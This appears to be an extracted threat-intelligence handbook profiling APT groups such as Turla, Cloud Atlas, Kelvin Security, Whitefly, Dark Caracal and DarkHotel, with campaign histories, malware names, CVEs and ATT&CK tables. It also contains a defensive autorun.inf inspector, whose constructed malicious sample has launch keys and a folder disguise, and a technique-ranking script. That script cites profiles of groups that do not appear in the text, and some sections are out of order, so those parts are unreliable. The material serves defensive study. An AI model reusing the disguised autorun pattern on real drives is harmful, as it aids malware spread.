Red October is a series of targeted intelligence-gathering attacks against diplomatic, governmental and scientific research organizations, mostly located in Eastern Europe, former USSR members and Central Asia.

2014 - 2017 - Re-emergence of the Inception Group

After the disclosures, the Cloud Atlas group was silent but re-emerged with improved malware and techniques. They continue to target embassies and the security, aerospace, research and media sectors around the world.

October 2018 - Attack against European targets

Cloud Atlas used a new first-stage PowerShell backdoor called POWERSHOWER to target European organizations. The lure documents are about current political affairs, like articles about the situation in Crimea.

Timeline
• Jan-2007: 2007-2013 Operation Red October
• Jan-2014: Re-emergence of the Inception Group
• Oct-2018: Attack against European targets

TOOLS, MALWARES AND VULNERABILITIES

Malwares _ Inception framework, POWERSHOWER, VBShower
Legitimate software _ None
Exploited vulnerabilities _ CVE-2017-11882, CVE-2014-1761, CVE-2012-0158, CVE-2011-3544, CVE-2018-0802, CVE-2010-3333, CVE-2009-3129, CVE-2012-1856

Targeted Countries _ Afghanistan, Armenia, Azerbaijan, Belarus, Belgium, Greece, India, Iran, Italy, Kazakhstan, Morocco, Pakistan, Russia, Switzerland, Turkmenistan, Uganda, Ukraine, United Arab Emirates, United States, Vietnam
Assumed origin of the attacker _ Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
T1091 - Replication Through Removable Media

Execution
T1086 - PowerShell

Persistence
T1060 - Registry Run Keys / Startup Folder

Defense Evasion
T1107 - File Deletion
T1112 - Modify Registry
T1140 - Deobfuscate/Decode Files or Information

Credential Access
T1056 - Input Capture
T1003 - Credential Dumping
T1214 - Credentials in Registry

Discovery
T1082 - System Information Discovery
T1046 - Network Service Scanning

Lateral Movement
T1091 - Replication Through Removable Media

Collection
T1056 - Input Capture
T1113 - Screen Capture
T1114 - Email Collection
T1025 - Data from Removable Media

Command and Control
T1065 - Uncommonly Used Port
T1071 - Standard Application Layer Protocol
T1032 - Standard Cryptographic Protocol

Exfiltration
T1022 - Data Encrypted
Alias _ ATK13, HIPPO TEAM, GROUP 88, KRYPTON, PFINET, POPEYE, SNAKE, TAG_0530, TURLA, UROBUROS, VENOMOUS BEAR, WATERBUG, WRAITH
Score _ 63
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Government Agencies, International Organizations, Political Organizations, High-Tech, Research, Defence, Aerospace
Motivations & Objectives _ Espionage
Language _ Unknown

DESCRIPTION

ATK13 (Turla, Uroburos, Waterbug, Venomous Bear) is a cyber espionage threat actor active since at least 2008, when it breached the US Department of Defence. ATK13 is a Russian-speaking group and is widely believed to be a Russian state-sponsored organization.

In 2015, Kaspersky described ATK13 as one of the “several elite APT groups have been using — and abusing — satellite links to manage their operations — most often, their C&C infrastructure”.

During 2018 and 2019, ATK13 continued to target governments and international organizations in multiple waves of attacks and continued to improve its tools. The most recent attack targeted an Iranian APT group called OilRig.

Turla's attack on one of Iran's most successful groups combines opportunism and international interests. It should be recalled that since 2014 and the annexation of Crimea, Western pressure and the fall of the oil price have plunged Russia into recession. For this reason, Russia has moved closer to Saudi Arabia, whose alliance with the United States had weakened under the Obama era in the wake of the Iranian nuclear agreement, supported by the former US President. It seems that the change in the American diplomatic line since the election of Donald Trump has not diverted Saudi Arabia from this alliance. This rapprochement of interests is denounced by Iran, most recently at the OPEC meeting in Vienna in July 2019. The reason for the tension is also economic, as both countries are positioning themselves to address the European gas market.

TOOLS, MALWARES AND VULNERABILITIES

Malwares _ Agent.Btz, Carbon, Comrat, Epic, Gazer, Kazuar, Kopiluwak, Mosquito, Neptun, Turla outlook backdoor, Uroburos
Legitimate software _ Arp, Empire, Mimikatz, Nbtstat, Net, Netstat, Reg, Systeminfo, Tasklist
Exploited vulnerabilities _ CVE-2012-1723, CVE-2013-5065, CVE-2013-3346, CVE-2009-3129, CVE-2013-2729, CVE-2012-4681

Targeted Countries _ Europe, Middle East, Central Asia, United Kingdom, Uzbekistan, United States, Tajikistan, Saudi Arabia, Poland, Kazakhstan, Russia, Netherlands, Romania, Germany, Iraq, Belgium, France, Belarus, Italy, Jordan, Iran, India
Assumed origin of the attacker _ Russia
CAMPAIGNS

November 2008 - Cyber-attack on US Defense Department computers

In November 2008, senior military leaders reported the malware breach incident that affected the U.S. Central Command network, including computers both in the headquarters and in the combat zones. The malware used was Agent.btz. This attack was quickly attributed to Russia; in 2010 the attribution was confirmed by a top Pentagon official. The worm Agent.btz spread itself into the US Defense Department network through USB flash drives using “autorun.inf”. It is considered “the worst breach of U.S. military computers in history”. It led to the creation of the United States Cyber Command, and the Pentagon spent nearly 14 months cleaning the worm. The US military was not the only victim: the worm spread globally and was still infecting users in 2013.

2005 - 2014 - The Snake campaign

The Snake campaign is a long-term operation targeting mostly European entities. BAE Systems found samples linked to this activity compiled from 2005 to 2014, which may indicate that this activity started in 2005.

Turla has targeted government institutions, military, education, research and pharmaceutical companies in more than 45 countries

In July 2014, Kaspersky described the Epic Turla operation targeting government institutions, embassies, military, education, research and pharmaceutical companies in more than 45 countries over 10 months. Turla targeted the Finnish Foreign Ministry in 2013 as part of this operation.

Turla attacks a Swiss company

Turla targeted the Swiss military firm RUAG between 2014 and 2016.

Turla conducted watering hole campaigns by targeting embassy websites

During the 2014 - 2017 period, ATK13 seems to have conducted watering hole campaigns by targeting embassy websites, as described by ESET, using the JavaScript payload ICEDCOFFEE.

Turla used a designed Adobe Flash fake installer and a web app hosted on Google Apps Script as a CnC server

In 2018, ATK13 used a very well-designed fake Adobe Flash installer and used a web app hosted on Google Apps Script as a CnC server. The typical targets are still embassies and consulates in Eastern Europe.

Governments and Defense contractors compromised

In March 2018, the German government publicly announced that it had been compromised by a Turla Outlook backdoor.

Turla attacked OilRig

Symantec observed ATK13 (called WaterBug) targeting the infrastructure of another advanced persistent threat group, Iranian this time, called OilRig (ATK40).

Timeline
• Jan-2005: 2005-2014 The Snake campaign
• Jan-2008: November 2008 Cyber-attack on US Defense Department computers
• Jan-2011: Turla has targeted government institutions, military, education, research and pharmaceutical companies in more than 45 countries
• Jan-2013: Governments and Defense contractors compromised
• Jan-2014: Turla attacks a Swiss company
• Jan-2014: Turla conducted watering hole campaigns by targeting embassy websites
• Jan-2018: Turla used a designed Adobe Flash fake installer and a web app hosted on Google Apps Script as a CnC server
• Jan-2018: Turla attacked OilRig
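Agent.btz's USB propagation, described in the November 2008 campaign above, relied on autorun.inf, a small INI-style file at the root of the drive whose [autorun] section can name a program for Windows to launch or offer when the media is inserted. The inspector below is an added example, not the handbook's content or any vendor's tool: it parses that file, flags the keys that cause a launch and the icon/action pairing that dresses the entry up as an ordinary folder, and can be pointed at the root of a mounted removable drive. Both sample files are constructed.

```python
import os
import tempfile

# Constructed samples: one a plain label/icon file, one with launch keys and a
# folder-icon disguise. Paths and names are invented for the example.
BENIGN_SAMPLE = """[autorun]
label=Vendor Driver Disc
icon=setup.ico
"""

SUSPICIOUS_SAMPLE = """[AutoRun]
open=data\\update.exe
shellexecute=data\\update.exe
shell\\open\\command=data\\update.exe
icon=%SystemRoot%\\system32\\shell32.dll,4
action=Open folder to view files
label=USB DISK
"""

# Extensions Windows will execute directly when named by a launch key.
EXECUTABLE_EXT = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".vbe",
                  ".js", ".jse", ".wsf", ".hta", ".dll", ".lnk"}


def parse_autorun(text: str) -> dict:
    """Parse INI-style autorun.inf text into {section: {key: value}}; keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue                      # junk outside a section or without '='
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip().strip('"')
    return sections


def is_launch_key(key: str) -> bool:
    """open=, shellexecute= and shell\\<verb>\\command= all cause execution."""
    return key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command"))


def assess_autorun(text: str) -> list:
    """Return reasons the file is suspicious; an empty list means nothing launch-related."""
    reasons = []
    for section, keys in parse_autorun(text).items():
        if not section.startswith("autorun"):   # [autorun], [autorun.amd64], ...
            continue
        for key, value in keys.items():
            if not is_launch_key(key):
                continue
            target = value.split()[0].lower() if value else ""
            ext = os.path.splitext(target)[1]
            if ext in EXECUTABLE_EXT or not ext:
                reasons.append(f"[{section}] {key}= launches '{value}'")
        # A folder icon from shell32.dll plus an Open-style action makes the AutoPlay
        # entry look like the normal 'open folder' choice.
        icon = keys.get("icon", "").lower()
        if "shell32.dll" in icon and "open" in keys.get("action", "").lower():
            reasons.append(f"[{section}] icon={keys['icon']} with action='{keys['action']}' mimics a folder")
    return reasons


def scan_removable_root(root: str):
    """Assess <root>/autorun.inf if present; None when the file does not exist."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return None
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return assess_autorun(fh.read())


def demo_scan() -> list:
    """Write the suspicious sample into a temporary 'drive root' and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "autorun.inf"), "w", encoding="utf-8") as fh:
            fh.write(SUSPICIOUS_SAMPLE)
        return scan_removable_root(root)


if __name__ == "__main__":
    for reason in demo_scan():
        print(reason)
```

The parser is deliberately hand-written rather than built on configparser so that duplicate keys, odd casing and junk lines (all of which a crafted file may contain to break stricter parsers) are tolerated; on a removable drive any launch key at all is worth reporting, and the icon/action pairing is the extra signal that the entry is meant to be clicked by mistake.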

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1086 - PowerShell
T1204 - User Execution

Persistence
T1004 - Winlogon Helper DLL
T1060 - Registry Run Keys / Startup Folder

Privilege Escalation
T1055 - Process Injection

Defense Evasion
T1102 - Web Service
T1055 - Process Injection
T1066 - Indicator Removal from Tools

Credential Access
T1110 - Brute Force

Discovery
T1049 - System Network Connections Discovery
T1012 - Query Registry
T1057 - Process Discovery
T1124 - System Time Discovery
T1016 - System Network Configuration Discovery
T1007 - System Service Discovery
T1082 - System Information Discovery
T1083 - File and Directory Discovery
T1018 - Remote System Discovery

Lateral Movement
T1077 - Windows Admin Shares
T1105 - Remote File Copy

Command and Control
T1071 - Standard Application Layer Protocol
T1105 - Remote File Copy
T1102 - Web Service

Exfiltration
T1011 - Exfiltration Over Other Network Medium
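The MODUS OPERANDI tables for the five groups profiled on these pages (Silence, APT33/ATK35, Lotus Blossom/ATK1, Cloud Atlas/ATK116 and Turla/ATK13) each list ATT&CK technique IDs. As an added example that is not part of the handbook, the script below loads those IDs exactly as printed and ranks them by how many of the five groups share them, so a detection team reading the profiles can see which techniques buy coverage against most of them at once; the group labels and the ALREADY_COVERED set are constructed placeholders.

```python
from collections import Counter

# Technique IDs exactly as printed in the MODUS OPERANDI tables for the five groups
# on these pages. Group labels are constructed for this example.
GROUPS = {
    "Silence (ATK 86)": """T1193 T1035 T1053 T1059 T1064 T1086 T1106 T1170 T1203 T1204 T1223
        T1060 T1134 T1027 T1107 T1140 T1082 T1105 T1113 T1125 T1043 T1071 T1079 T1132 T1219
        T1022 T1489""",
    "APT33 (ATK35)": """T1192 T1078 T1053 T1203 T1086 T1204 T1060 T1068 T1027 T1480 T1003
        T1110 T1040 T1105 T1065 T1071 T1132 T1032 T1043 T1002 T1048""",
    "Lotus Blossom (ATK1)": """T1189 T1193 T1035 T1064 T1085 T1136 T1050 T1060 T1098 T1055
        T1027 T1036 T1045 T1107 T1140 T1497 T1046 T1057 T1082 T1087 T1135 T1105 T1032 T1043
        T1071 T1094 T1022""",
    "Cloud Atlas (ATK116)": """T1192 T1193 T1091 T1086 T1060 T1107 T1112 T1140 T1056 T1003
        T1214 T1082 T1046 T1113 T1114 T1025 T1065 T1071 T1032 T1022""",
    "Turla (ATK13)": """T1192 T1193 T1086 T1204 T1004 T1060 T1055 T1102 T1066 T1110 T1049
        T1012 T1057 T1124 T1016 T1007 T1082 T1083 T1018 T1077 T1105 T1071 T1011""",
}

# Names for the IDs that come up most often, copied from the tables above.
NAMES = {
    "T1060": "Registry Run Keys / Startup Folder", "T1071": "Standard Application Layer Protocol",
    "T1082": "System Information Discovery", "T1086": "PowerShell",
    "T1105": "Remote File Copy", "T1193": "Spearphishing Attachment",
}

# Constructed: techniques a hypothetical SOC already has detections for.
ALREADY_COVERED = {"T1071", "T1193", "T1086"}


def technique_sets(groups: dict) -> dict:
    """Turn the whitespace-separated ID strings into {group: set(ids)}."""
    return {g: set(ids.split()) for g, ids in groups.items()}


def technique_frequency(groups: dict) -> Counter:
    """How many of the groups list each technique."""
    counts = Counter()
    for ids in technique_sets(groups).values():
        counts.update(ids)
    return counts


def shared_by_all(groups: dict) -> set:
    """Techniques every group on the page uses."""
    return set.intersection(*technique_sets(groups).values())


def shared(groups: dict, a: str, b: str) -> set:
    """Techniques two named groups have in common."""
    sets = technique_sets(groups)
    return sets[a] & sets[b]


def rank_uncovered(groups: dict, covered: set) -> list:
    """
    Techniques without a detection yet, ordered by how many groups use them
    (ties broken by ID). The head of this list is where new coverage buys the most.
    """
    freq = technique_frequency(groups)
    return sorted(((t, n) for t, n in freq.items() if t not in covered),
                  key=lambda tn: (-tn[1], tn[0]))


if __name__ == "__main__":
    print("used by all five groups:", sorted(shared_by_all(GROUPS)))
    for tid, n in rank_uncovered(GROUPS, ALREADY_COVERED)[:6]:
        print(f"{tid} {NAMES.get(tid, '')}: {n}/5 groups")
```

Two techniques, T1060 (Registry Run Keys / Startup Folder) and T1071 (Standard Application Layer Protocol), appear in all five tables, and with the three placeholder detections in place the ranking puts T1060 first, followed by the two four-group techniques T1082 and T1105. The same routine works on any set of profiles from the handbook once their IDs are typed in.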
Alias _ ATK 140, Kelvin Security, KelvinSec Team, KelvinSecteamGobVe, TAG-CR6, teamkelvinsecteam
Score _ 62
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Administration, Aerospace, Aviation, Casino & Gaming, Communication, Cyber-security, Defense, Education, Energy, Financial Services, Government Agencies, Healthcare, High-Tech, Hospitality, International Organizations, Manufacturing, Media, Military, Naval, Pharmaceutical, Political Organizations, Research, Retail, Transportation
Motivations & Objectives _ Personal gain, Notoriety, Ideology
Language _ English, Spanish

DESCRIPTION

Kelvin Security is a South American “blackhat” hacking group, led by an individual named Kevin Parra. The group has been active since at least 2015 and displays medium technical capabilities. The group has a vast online presence, both on the Clearnet (with numerous social media outlets, a YouTube channel, blogs, etc.) and on Dark Web forums and markets populated by cybercriminals. These outlets are mainly used for promoting stolen data they sell and for sharing malicious tools and techniques (usually publicly available). During their activity Kelvin Security claimed responsibility for hundreds of attacks against almost all industry verticals, with a particular focus on the government sector. The group's specialty is web-based attacks that typically lead to data exfiltration. However, the group has also displayed interest in compromising ICS/SCADA systems and medical devices. The group also runs an online shop (hxxp://ksecureteam[.]com) where they offer a variety of hacking-related services (malware, exploits, databases, systems access, etc.), also as a subscription model.

Alleged Kelvin Security members: Kelvin Parra (Venezuela), Rodrigo Alonzo Canaza (Peru), Omar Rodriguez (Peru), Jhonatan James (Colombia).

CAMPAIGNS

June 2015 - University of Madrid Attack
Kelvin Security claimed responsibility for hacking UNIVERSIDAD POLITÉCNICA DE MADRID (hxxp://www.upm.es/).

June 2016 - Saudi Arabia Banks Attack
Kelvin Security claimed responsibility for hacking Saudi Arabia bank accounts.

July 2016 - Miami and LAX Airports Attack
Kelvin Security claimed responsibility for hacking the Miami and LAX airports, dumping data.

July 2017 - Italian Nuclear Institute Attack
Kelvin Security claimed responsibility for hacking the Italian “Istituto Nazionale di Fisica Nucleare”, dumping data.

2018 - Venezuelan Government Attack
Kelvin Security leaked PII of Venezuelan Government officials, including that of President Nicolás Maduro.

June 2018 - US Aircraft Drone Attack
Kelvin Security offered for sale alleged top secret documents for Reaper and Predator drones.

June 2018 - Venezuela's Electoral System Attack
Kelvin Security offered for sale alleged data stolen from Venezuela's electoral system.

June 2018 - Chilean Oil and Energy Companies Attack
Kelvin Security offered for sale access and shell for contractors in Chile.

June 2018 - Security Cameras USA and Mexico Border Attack
Kelvin Security shared for free access to security cameras on the USA-Mexico border.

June 2018 - Kinder Morgan Attack
Kelvin Security claimed responsibility for hacking the SCADA system of Kinder Morgan in Roswell, Nevada.

TOOLS, MALWARES AND VULNERABILITIES

Malwares _
Custom tools: regimenDDoS, WhatsApp IP Capture Script, OutlookLeakTest
Tools used by multiple adversaries: PhoneMonitor, KimcilWare Ransomware, PoT
Publicly available tools: Athena Botnet, BoopSuite, Browser-RAT, Burp Suite, Chimay-Red, Chrome Password Dumper, Crypter, Dumb0, GPON, Hodin RAT, Industrial Security Exploitation Framework, Katana Framework, LSB-Steganography, LimeRAT, LizardStresser Bot, Loki RAT, Nmap, QTLJacking, RACP, Splice-Admin, TrojanCockroach, Vanilla RAT, WES-NG, cisco-rce, google-drive-exploit, google_RAT, iGoat-Swift, izi-locker, rdroid, snallygaster, vhackos-botnet
Legitimate software _ None Identified
Exploited vulnerabilities _ CVE-2016-0777, CVE-2016-8858, CVE-2017-3881, CVE-2018-10561, CVE-2018-10676, CVE-2018-1133, CVE-2018-20377, CVE-2018-2879, CVE-2018-7600, CVE-2019-0708, CVE-2019-0841, CVE-2019-7216


Targeted Countries _
Argentina Israel Sweden
Australia Italy Switzerland
Bolivia Kazakhstan Taiwan
Brazil Kuwait Netherlands
China Mexico Philippines
Colombia Morocco Turkey
Dominican Pakistan U
 nited
Republic Peru States
Ecuador Poland Ukraine
France Russian Uruguay
Germany Federation
Hong Kong South Venezuela
India Korea
Iran Spain

Venezuela – Colombia - Peru

June 2018 - Mexico City Airport Attack
Kelvin Security offered for sale an alleged database of "Grupo Aeroportuario de la Ciudad de Mexico".

June 2018 - Bank of Venezuela System Attack
Kelvin Security offered for sale an alleged database of Banplus bank and access to it.

June 2018 - Peru Transportation System Attack
Kelvin Security offered for sale an alleged database of the Peru Transportation System.

July 2018 - Colombian Intelligence System Attack
Kelvin Security offered for sale an alleged Colombian intelligence system similar to NSA's XKeyscore.

July 2018 - Citadel New York Stock Exchange Attack
Kelvin Security offered for sale an alleged database of Citadel New York Stock Exchange.

August 2018 - Boodai Aviation United Arab Emirates Attack
Kelvin Security offered for sale sensitive data allegedly stolen from the Boodai Aviation Group.

August 2018 - Credit Bank Colombia Users System Attack
Kelvin Security offered for sale an alleged database of Bancoomeva bank.

August 2018 - Movistar Mexico Attack
Kelvin Security claimed to have found a SQLi vulnerability in Movistar Mexico.

August 2018 - Air Force Venezuela System Attack
Kelvin Security offered for sale the SEID (Sistema de Evaluación Integral Digitalizado) system of the Venezuelan air force.

August 2018 - Dubai Petroleum Customers Attack
Kelvin Security offered for sale an alleged user database of the Dubai Petroleum company.

August 2018 - CITADEL Stock Exchange Attack
Kelvin Security offered for sale an alleged database of Citadel.

November 2018 - Government System of Mexico Attack
Kelvin Security offered for sale an alleged Government System of Mexico database.

November 2018 - NORTON Colombia Attack
Kelvin Security shared for free an alleged database of NORTON (Symantec) Colombia.

January 2019 - Government of Colombia Attack
Kelvin Security offered for sale alleged databases of multiple Colombian government websites.

January 2019 - Colombian Banks Attack
Kelvin Security offered for sale alleged databases of multiple Colombian banks.

February 2019 - Cuba Airline Attack
Kelvin Security shared for free an alleged database of Cuba Airlines pilots.

March 2019 - ICS Access for Multiple Countries Attack
Kelvin Security offered for sale access to 225 ICS from the USA, Russia, South Korea, Australia, Sweden, France, Germany, and Spain.

March 2019 - Airbnb Spain Attack
Kelvin Security shared for free alleged databases stolen from Airbnb Spain.

April 2019 - Ecuadorian Satellites Attack
Kelvin Security shared for free alleged access to Ecuadorian satellite positions.

June 2019 - Iran Mizbanfa Hosting Attack
Kelvin Security claimed responsibility for compromising the Iranian mizbanfa.net Internet hosting provider.

June 2019 - JAPAN National Defense Academy Attack
Kelvin Security shared for free alleged access to JAPAN National Defense Academy servers.

Timeline (from the campaign chart):
• Jun-2015: University of Madrid attack
• Jun-2016: Saudi Arabia banks attack
• Jul-2016: Miami and LAX Airports attack
• Jul-2017: Italian Nuclear Institute attack
• Jun-2018: US Aircraft Drone attack; Venezuela's electoral system attack; Chilean Oil and Energy companies attack; Security cameras USA and Mexico border attack; Kinder Morgan attack; Mexico City airport attack; Bank of Venezuela attack; Peru Transportation system attack
• Jul-2018: Colombian Intelligence System attack; Citadel New York stock exchange attack
• Aug-2018: Boodai Aviation United Arab Emirates attack; Credit Bank Colombia users system attack; Movistar Mexico attack; Air Force Venezuela system attack; Dubai Petroleum customers attack; Citadel stock exchange attack
• Nov-2018: Government system of Mexico attack; Norton Colombia attack
• Jan-2019: Government of Colombia attack; Colombian banks attack
• Feb-2019: Cuba Airline attack
• Mar-2019: ICS Access for multiple countries attack; Airbnb Spain attack
• Apr-2019: Ecuadorian satellites attack
• Jun-2019: Iran Mizbanfa hosting attack; Japan National Defense Academy attack

Alias _
• ATK 140
• Kelvin Security
• KelvinSec Team
• KelvinSecteamGobVe
• TAG-CR6
• teamkelvinsecteam

Score: 62

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Administration, Aerospace, Aviation, Casino & Gaming, Communication, Defense, Education, Energy, Financial Services, Government Agencies, Healthcare, High-Tech, Hospitality, International Organizations, Manufacturing, Media, Military, Cyber-security, Naval, Pharmaceutical, Political Organizations, Research, Retail, Transportation

Motivations & Objectives _
Personal-gain, Notoriety, Ideology

Language
English, Spanish

MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
• T1078 - Valid Accounts
• T1133 - External Remote Services
• T1190 - Exploit Public-Facing Application

Execution
• T1059 - Command-Line Interface
• T1064 - Scripting
• T1061 - Graphical User Interface
• T1086 - PowerShell

Persistence
• T1078 - Valid Accounts
• T1133 - External Remote Services

Privilege Escalation
• T1078 - Valid Accounts

Defense Evasion
• T1064 - Scripting
• T1078 - Valid Accounts

Credential Access
• T1003 - Credential Dumping
• T1110 - Brute Force

Exfiltration
• T1002 - Data Compressed
• T1020 - Automated Exfiltration
• T1022 - Data Encrypted
• T1041 - Exfiltration Over Command and Control Channel
• T1048 - Exfiltration Over Alternative Protocol

Command and Control
• T1043 - Commonly Used Port
• T1219 - Remote Access Tools

Alias _
• ATK83
• SectorM04
• Whitefly

Score: 61

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Engineering, Healthcare, Media, Telecommunication

Motivations & Objectives _
Espionage

Language
Unknown

DESCRIPTION
ATK83 (Whitefly) is the group responsible for the SingHealth breach between August 2017 and July 2018, during which 1.5 million patient medical records were accessed and around 159,000 of these records were exfiltrated, including those of Prime Minister Lee Hsien Loong (it should be noted that the Singaporean Prime Minister has had significant health concerns in the past). Whitefly likely used phishing to gain access to a front-end workstation before moving laterally to the SCM (Sunrise Clinical Manager) database. Singapore's Committee of Inquiry described the attacker as skilled, sophisticated and well-resourced, with an extensive C2 infrastructure and the capability to develop multiple customised and stealthy tools. Whitefly made great efforts to stay undetected or, at least, to make the attack difficult to attribute. It re-entered the network after being detected in order to delete system and program logs.

Symantec discovered that this group has been active since at least 2017 and has conducted multiple targeted attacks against organizations, mostly in Singapore, across a large range of sectors to steal sensitive information. Some custom tools used by Whitefly were also used between May 2017 and December 2018 to conduct attacks against the defense, telecom and energy sectors in Southeast Asia and Russia, and against the hospitality sector in the United Kingdom, but these attacks may have been launched by other groups with access to the same tools.

CAMPAIGNS

SingHealth cyber attack
Between 23 August 2017 and 20 July 2018, a cyber-attack of unprecedented scale and sophistication was carried out on the patient database of Singapore Health Services Private Limited ("SingHealth").

Timeline (from the campaign chart):
• Aug-2017: SingHealth cyber attack

TOOLS, MALWARES AND VULNERABILITIES

Malwares
• Nibatad
• PlugX
• Termite
• Vcrodat

Legitimate software
• Mimikatz

Exploited vulnerabilities
• CVE-2016-0051



Targeted Countries _
Singapore, Southeast Asia

Assumed origin of the attacker: Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
• T1078 - Valid Accounts
• T1192 - Spearphishing Link
• T1193 - Spearphishing Attachment

Execution
• T1035 - Service Execution
• T1204 - User Execution

Persistence
• T1038 - DLL Search Order Hijacking
• T1050 - New Service
• T1060 - Registry Run Keys / Startup Folder
• T1078 - Valid Accounts
• T1158 - Hidden Files and Directories
• T1179 - Hooking

Privilege Escalation
• T1038 - DLL Search Order Hijacking
• T1050 - New Service
• T1078 - Valid Accounts
• T1179 - Hooking

Defense Evasion
• T1036 - Masquerading
• T1038 - DLL Search Order Hijacking
• T1078 - Valid Accounts
• T1158 - Hidden Files and Directories

Credential Access
• T1003 - Credential Dumping
• T1179 - Hooking

Discovery
• T1049 - System Network Connections Discovery
• T1082 - System Information Discovery

Command and Control
• T1032 - Standard Cryptographic Protocol
• T1043 - Commonly Used Port
• T1071 - Standard Application Layer Protocol

Exfiltration
• T1022 - Data Encrypted

Impact
• T1485 - Data Destruction

Alias _
• ATK 27
• DARK CARACAL
• TAG-CT3

Score: 59

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Defense, Education, Financial Services, Government Agencies, Healthcare, International Organizations, Legal Services, Manufacturing, Media

Motivations & Objectives _
Coercion, Ideology, Organizational-gain, Unpredictable

Language
Unknown

DESCRIPTION
Dark Caracal is an advanced persistent threat group active since January 2012. It is supposedly linked to the Lebanese government, since its activity was traced to the headquarters of the General Directorate of General Security in Beirut, Lebanon. Dark Caracal has been conducting a multi-platform APT-level surveillance operation targeting individuals and institutions globally.

CAMPAIGNS

January 2012 - First Mobile Surveillance Campaign
Named oldb, an Android campaign that included stealing bookmarks and browsing history from web pages. It identified victims that were active in political discourse.

November 2012 - Phishing Campaign
Security researchers identified four "personas", two phone numbers and two domains associated with Dark Caracal, all of which are somehow connected to the email address op13@mail[.]com. Aliases associated with op13@mail[.]com include Nancy Razzouk, Hadi Mazeh, and Rami Jabbour. All of the physical addresses listed in the WHOIS domain registrations associated with op13@mail[.]com tend to cluster around the Wi-Fi locations with the SSID "Bld3F6". This is near the General Security building in Beirut.

June 2015 - Operation Manul
Operation Manul phishing emails were first seen. The campaign included a series of attacks targeting journalists and political activists critical of Kazakhstan's authoritarian government, along with their family members, lawyers, and associates. References were found to Android components found on the infrastructure built by Dark Caracal.

December 2016 - January 2018 - Mobile Surveillance Campaign
Over the course of several years, Dark Caracal has launched mobile surveillance campaigns. About 10 campaigns were found in total.

Timeline (from the campaign chart):
• Jan-2012: First Mobile Surveillance Campaign
• Nov-2012: Phishing Campaign
• Jun-2015: Operation Manul
• Dec-2016 to Jan-2018: Mobile Surveillance Campaign

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools
• Pallas
• Windows Malware
• CrossRAT
Tools used by multiple adversaries
• FinFisher
Publicly available tools
• None Identified

Exploited vulnerabilities
• None Identified

Legitimate software
• Signal: cross-platform encrypted messaging app that was trojanized by the adversary to steal sensitive data.
• Threema: cross-platform encrypted messaging app that was trojanized by the adversary to steal sensitive data.
• Primo: social chat app that was trojanized by the adversary to steal sensitive data.
• WhatsApp: social chat app that was used for sending phishing messages to victims.
• PlusMessenger: social chat app that was used for sending phishing messages to victims.
• Flash Player: software used to stream and view video, audio, multimedia and Rich Internet Applications (RIA) on a computer or supported mobile device. It was trojanized by the adversary to steal sensitive data.
• Google Play Push Notification: push notification component for the Google Play app on Android that was trojanized by the adversary to steal sensitive data.
• Psiphon: VPN for secure navigation.
• Orbot: TOR proxy for secure navigation.



Targeted Countries _
China, France, Germany, India, Italy, Jordan, Lebanon, Nepal, Netherlands, Pakistan, Philippines, Qatar, Russia, Saudi Arabia, South Korea, Switzerland, Syria, Thailand, United States, Venezuela, Vietnam

Assumed origin of the attacker: Lebanon

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
• T1078 - Valid Accounts
• T1133 - External Remote Services
• T1189 - Drive-by Compromise
• T1194 - Spearphishing via Service
• T1195 - Supply Chain Compromise

Execution
• T1064 - Scripting
• T1106 - Execution through API
• T1196 - Control Panel Items
• T1204 - User Execution
• T1223 - Compiled HTML File

Persistence
• T1060 - Registry Run Keys / Startup Folder
• T1078 - Valid Accounts
• T1133 - External Remote Services

Privilege Escalation
• T1078 - Valid Accounts

Defense Evasion
• T1027 - Obfuscated Files or Information
• T1045 - Software Packing
• T1064 - Scripting
• T1078 - Valid Accounts
• T1223 - Compiled HTML File
• T1196 - Control Panel Items

Discovery
• T1083 - File and Directory Discovery

Collection
• T1005 - Data from Local System
• T1113 - Screen Capture

Command and Control
• T1071 - Standard Application Layer Protocol

Alias _
• APT-C-06
• ATK52
• DUBNIUM
• DARKHOTEL
• FALLOUT TEAM
• KARBA
• LUDER
• NEMIM
• PIONEER
• SIG25
• SHADOW CRANE
• TAPAOUX

Score: 59

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Administration, Defense, Government Agencies, Military, Political Organizations

Motivations & Objectives _
Espionage

Language
Korean

DESCRIPTION
DarkHotel is a Korean-speaking attacker. While some have attributed this attacker to North Korea, notably due to the overlap between the group and ATK4, there is a consensus linking this threat actor to South Korea instead. This actor targets government entities, especially in the diplomatic, defense and law enforcement fields. It is especially active around the Sea of Japan and the East China Sea. Its goal is espionage of specific individuals.

The group possesses extensive cryptographic knowledge, which allowed it to create fake certificates, and a capacity to develop and use 0-days (especially around Flash Player). It also has access to an extended and reliable network infrastructure, allowing the group to maintain long-term access to compromised systems.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
• DarkHotel
• Nemim
• Tapaoux

Legitimate software
• None

